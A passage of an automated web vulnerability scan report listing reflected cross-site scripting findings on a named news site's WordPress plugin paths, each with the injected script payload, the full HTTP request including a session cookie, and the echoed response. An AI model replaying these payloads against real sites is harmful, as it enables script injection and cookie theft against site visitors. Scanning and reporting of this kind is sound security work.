<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display17a0d\"><script>alert(1)</script>7d151f57cba/styles/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.248. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94b8b"><script>alert(1)</script>6eb885d1aad was submitted in the REST URL parameter 5. This input was echoed as 94b8b\"><script>alert(1)</script>6eb885d1aad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/styles94b8b"><script>alert(1)</script>6eb885d1aad/menu-manager.css?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:38 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/styles94b8b\"><script>alert(1)</script>6eb885d1aad/menu-manager.css?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.249. http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/menu-manager/display/styles/menu-manager.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb93d"><script>alert(1)</script>8a7602599a5 was submitted in the REST URL parameter 6. This input was echoed as cb93d\"><script>alert(1)</script>8a7602599a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/menu-manager/display/styles/menu-manager.csscb93d"><script>alert(1)</script>8a7602599a5?ver=2.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=9fde11401aee697d2f62e978ce373c3d
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:16 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/menu-manager/display/styles/menu-manager.csscb93d\"><script>alert(1)</script>8a7602599a5?ver=2.0.0'; }); return true;" >
...[SNIP]...

4.250. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3c67"><script>alert(1)</script>610b9455319 was submitted in the REST URL parameter 1. This input was echoed as b3c67\"><script>alert(1)</script>610b9455319 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentb3c67"><script>alert(1)</script>610b9455319/plugins/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:20 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-contentb3c67\"><script>alert(1)</script>610b9455319/plugins/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.251. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bce72"><script>alert(1)</script>5a211b9b14c was submitted in the REST URL parameter 2. This input was echoed as bce72\"><script>alert(1)</script>5a211b9b14c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/pluginsbce72"><script>alert(1)</script>5a211b9b14c/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:13:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:13:51 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:13:51 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/pluginsbce72\"><script>alert(1)</script>5a211b9b14c/nextgen-gallery/css/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.252. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a6a6"><script>alert(1)</script>523d0c5812c was submitted in the REST URL parameter 3. This input was echoed as 7a6a6\"><script>alert(1)</script>523d0c5812c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery7a6a6"><script>alert(1)</script>523d0c5812c/css/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:27 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery7a6a6\"><script>alert(1)</script>523d0c5812c/css/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.253. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63507"><script>alert(1)</script>c0dbf220b11 was submitted in the REST URL parameter 4. This input was echoed as 63507\"><script>alert(1)</script>c0dbf220b11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/css63507"><script>alert(1)</script>c0dbf220b11/ngg_shadow.css?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:16:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/css63507\"><script>alert(1)</script>c0dbf220b11/ngg_shadow.css?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.254. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/css/ngg_shadow.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc53c"><script>alert(1)</script>d817813d048 was submitted in the REST URL parameter 5. This input was echoed as dc53c\"><script>alert(1)</script>d817813d048 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/css/ngg_shadow.cssdc53c"><script>alert(1)</script>d817813d048?ver=1.0.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:18:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=a538c484d31b7acc540251523e95d5cf
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:18:54 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:18:54 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51057

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/css/ngg_shadow.cssdc53c\"><script>alert(1)</script>d817813d048?ver=1.0.0'; }); return true;" >
...[SNIP]...

4.255. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ffcb"><script>alert(1)</script>fc0669eabc9 was submitted in the REST URL parameter 1. This input was echoed as 8ffcb\"><script>alert(1)</script>fc0669eabc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content8ffcb"><script>alert(1)</script>fc0669eabc9/plugins/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:12:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:12:18 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:12:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content8ffcb\"><script>alert(1)</script>fc0669eabc9/plugins/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.256. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d112"><script>alert(1)</script>f10e6f9e41c was submitted in the REST URL parameter 2. This input was echoed as 9d112\"><script>alert(1)</script>f10e6f9e41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins9d112"><script>alert(1)</script>f10e6f9e41c/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:14:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:14:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:14:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins9d112\"><script>alert(1)</script>f10e6f9e41c/nextgen-gallery/shutter/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.257. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9ff5"><script>alert(1)</script>ea33fa666d7 was submitted in the REST URL parameter 3. This input was echoed as b9ff5\"><script>alert(1)</script>ea33fa666d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-galleryb9ff5"><script>alert(1)</script>ea33fa666d7/shutter/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:15:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:15:49 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:15:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-galleryb9ff5\"><script>alert(1)</script>ea33fa666d7/shutter/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.258. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10c9c"><script>alert(1)</script>1dcbd1a3314 was submitted in the REST URL parameter 4. This input was echoed as 10c9c\"><script>alert(1)</script>1dcbd1a3314 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/nextgen-gallery/shutter10c9c"><script>alert(1)</script>1dcbd1a3314/shutter-reloaded.css?ver=1.3.0 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:17:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f98fdf2c77f5f59862a5402157347a41
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:17:27 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:17:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-content/plugins/nextgen-gallery/shutter10c9c\"><script>alert(1)</script>1dcbd1a3314/shutter-reloaded.css?ver=1.3.0'; }); return true;" >
...[SNIP]...

4.259. http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 5]

